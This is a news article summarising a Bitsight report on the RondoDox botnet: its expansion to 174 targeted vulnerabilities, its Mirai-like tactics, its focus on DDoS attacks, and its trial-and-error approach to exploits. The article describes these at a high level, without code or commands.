The RondoDox botnet has significantly broadened its scope, now targeting 174 vulnerabilities, according to a recent report by Bitsight. This marks a substantial increase from its previous activity, as the botnet’s developers refine their approach to exploiting security flaws.
Evolution of RondoDox Attacks
Initially observed in March 2025, RondoDox began its operations by executing widespread vulnerability scans. By the end of that year, the botnet was known to target 56 vulnerabilities, including some without CVE identifiers. Its focus then included exploiting vulnerabilities like React2Shell.
Bitsight now reports that RondoDox’s approach has shifted significantly. Rather than employing a broad, indiscriminate attack strategy, its operators are now concentrating on specific vulnerabilities that present a higher likelihood of successful exploitation.
Strategic Targeting and Techniques
RondoDox shares several traits with the Mirai botnet, particularly in its initial attack methods that involve exploiting weak credentials and unsanitized inputs. Unlike Mirai, however, RondoDox prioritizes launching distributed denial-of-service (DDoS) attacks over simply expanding its network of infected devices.
To facilitate its operations, RondoDox scans the internet for exposed devices, employing proprietary infrastructure to deploy malware implants designed to evade detection. These implants not only remove existing malware competitors but also establish a secure environment for executing their payload.
Ongoing Adaptation and Challenges
Bitsight’s investigation reveals that the botnet’s management leverages over 24 IP addresses for various tasks, including device exploitation and command distribution. Notably, the botnet’s operators frequently update their list of targeted vulnerabilities, sometimes exploiting up to 49 different flaws in a single day. However, they often discard most vulnerabilities quickly.
Interestingly, while RondoDox remains vigilant in monitoring the latest vulnerability disclosures, it struggles with effectively implementing some of these exploits. This suggests a trial-and-error approach, with the botnet’s operators continuously testing and adapting based on their success rates.
Despite its evolving strategies, Bitsight clarifies that RondoDox does not utilize loader-as-a-service for distribution, and prior assumptions about its peer-to-peer functionalities are unfounded.
Related articles highlight other cybersecurity threats, including disruptions in services like SocksEscort and the emergence of new botnets such as Aeternum and SSHStalker, underscoring the dynamic nature of cyber threats.
